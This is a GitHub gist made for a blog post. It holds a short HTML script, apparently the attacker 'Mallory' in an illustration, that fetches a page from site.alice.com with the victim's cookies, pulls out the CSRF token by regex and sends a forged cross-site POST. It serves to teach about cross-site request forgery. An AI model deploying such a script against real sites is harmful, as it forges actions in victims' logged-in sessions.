Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

@SteveLTN

SteveLTN/site-mallory-attempt2.html

Last active May 7, 2017 21:18
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SteveLTN/c331b9c864598f81878b4296adc9ad4a to your computer and use it in GitHub Desktop.
Save SteveLTN/c331b9c864598f81878b4296adc9ad4a to your computer and use it in GitHub Desktop.
Download ZIP
For blog post
Raw
site-mallory-attempt2.html
<script>
const url = 'http://site.alice.com/posts'
fetch(url, { method: "GET", credentials: 'include' }).
then((response) => response.text()).
then((body) => {
const re = new RegExp('<meta name="csrf-token" content="(.*)" />')
const csrfToken = re.exec(body)[1]
return csrfToken
}).
then((csrfToken) => {
const headers = new Headers({'X-CSRF-Token': csrfToken})
fetch(url, {
method: 'POST',
headers: headers,
credentials: 'include'
})
})
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment